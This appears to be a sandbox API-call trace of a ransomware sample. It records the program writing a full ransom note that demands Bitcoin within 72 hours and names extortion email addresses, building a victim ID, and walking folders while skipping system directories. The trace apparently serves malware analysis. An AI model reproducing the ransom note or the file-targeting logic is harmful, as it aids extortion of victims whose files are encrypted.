	[0167.513] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0167.513] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0167.527] CloseHandle (hObject=0x390) returned 1
	[0167.528] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.528] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.529] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0167.529] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.530] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0167.530] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0167.530] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.530] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0167.531] CloseHandle (hObject=0x390) returned 1
	[0167.532] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7d5f46f4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0167.533] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned 91
	[0167.533] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.533] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", cchLength=0x5b | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned 0x5b
	[0167.533] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.533] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="windows") returned 0x0
	[0167.533] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.534] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="boot") returned 0x0
	[0167.534] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.534] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="system volume information") returned 0x0
	[0167.534] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.534] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.534] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.534] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="temp") returned 0x0
	[0167.535] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.535] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="program files") returned 0x0
	[0167.535] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.535] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.535] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.535] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="appdata") returned 0x0
	[0167.535] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.536] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="application data") returned 0x0
	[0167.536] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.536] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="winnt") returned 0x0
	[0167.536] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.536] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="tmp") returned 0x0
	[0167.536] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.536] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="cache") returned 0x0
	[0167.537] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.537] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.537] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.537] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="webcache") returned 0x0
	[0167.537] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.537] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="inetcache") returned 0x0
	[0167.537] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.538] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="nvidia") returned 0x0
	[0167.538] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.538] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="packages") returned 0x0
	[0167.538] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.538] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="cookies") returned 0x0
	[0167.538] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.539] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="programdata") returned 0x0
	[0167.539] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0167.539] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0167.539] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7d5f46f4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.539] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0167.539] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x0, cFileName="background.png", cAlternateFileName="")) returned 1
	[0167.539] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb61, dwReserved0=0x0, dwReserved1=0x0, cFileName="behavior.xml", cAlternateFileName="")) returned 1
	[0167.540] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xadc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="device.png", cAlternateFileName="")) returned 1
	[0167.540] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d5f46f4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d5f46f4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d640c21, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0167.540] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d5f46f4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d5f46f4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d5f46f4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0167.540] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="overlay.png", cAlternateFileName="")) returned 1
	[0167.540] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="superbar.png", cAlternateFileName="")) returned 1
	[0167.540] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="superbar.png", cAlternateFileName="")) returned 0
	[0167.540] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0167.540] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0167.540] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 1
	[0167.541] lstrcmpW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="..") returned 1
	[0167.541] lstrcmpW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2=".") returned 1
	[0167.541] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device"
	[0167.541] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\"
	[0167.541] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\", lpString2="{8702d817-5aad-4674-9ef3-4d3decd87120}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}"
	[0167.541] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}"
	[0167.541] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\"
	[0167.541] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\"
	[0167.541] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*"
	[0167.541] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0167.542] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned 91
	[0167.542] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.542] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", cchLength=0x5b | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned 0x5b
	[0167.542] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.542] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="windows") returned 0x0
	[0167.542] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.543] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="boot") returned 0x0
	[0167.543] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.543] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="system volume information") returned 0x0
	[0167.543] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.543] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.543] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.543] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="temp") returned 0x0
	[0167.544] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.544] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="program files") returned 0x0
	[0167.544] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.544] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.544] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.544] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="appdata") returned 0x0
	[0167.544] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.545] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="application data") returned 0x0
	[0167.545] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.545] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="winnt") returned 0x0
	[0167.545] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.545] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="tmp") returned 0x0
	[0167.545] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.545] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="cache") returned 0x0
	[0167.546] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.546] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.546] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.546] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="webcache") returned 0x0
	[0167.546] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.562] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="inetcache") returned 0x0
	[0167.563] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.563] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="nvidia") returned 0x0
	[0167.564] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.564] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="packages") returned 0x0
	[0167.564] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.564] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="cookies") returned 0x0
	[0167.564] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.564] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="programdata") returned 0x0
	[0167.564] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.565] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x0, cFileName="background.png", cAlternateFileName="")) returned 1
	[0167.565] lstrcmpW (lpString1="background.png", lpString2="..") returned 1
	[0167.565] lstrcmpW (lpString1="background.png", lpString2=".") returned 1
	[0167.565] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\"
	[0167.565] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="background.png" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"
	[0167.565] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned 102
	[0167.565] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
